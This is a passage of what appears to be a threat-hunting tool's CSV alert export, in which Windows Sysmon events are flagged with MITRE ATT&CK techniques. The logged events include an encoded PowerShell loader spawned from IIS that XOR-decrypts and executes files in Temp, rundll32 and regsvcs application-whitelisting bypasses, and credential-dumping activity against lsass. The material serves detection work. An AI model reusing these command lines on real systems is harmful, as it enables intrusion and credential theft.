AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 20 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.560 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4920 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.893 + 747F3D96-6628-5D3F-0000-0010349B8800 + 6552 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 19 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.309 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 19 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.309 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6594 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1059,technique_name=Command-Line Interface + 2019-04-27 15:57:53.806 + 365ABB72-7C01-5CC4-0000-00105C5C0C00 + 3076 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /A + C:\Users\IEUser\AppData\Roaming\ + IEWIN7\IEUser + 365ABB72-7AB1-5CC4-0000-0020BEF40000 + 0xf4be + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7C01-5CC4-0000-0010F9530C00 + 2992 + C:\Users\IEUser\AppData\Roaming\NvSmart.exe + "C:\Users\IEUser\AppData\Roaming\NvSmart.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5925 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.392 + 365ABB72-3D6E-5CEB-0000-00100C96FF00 + 3136 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAa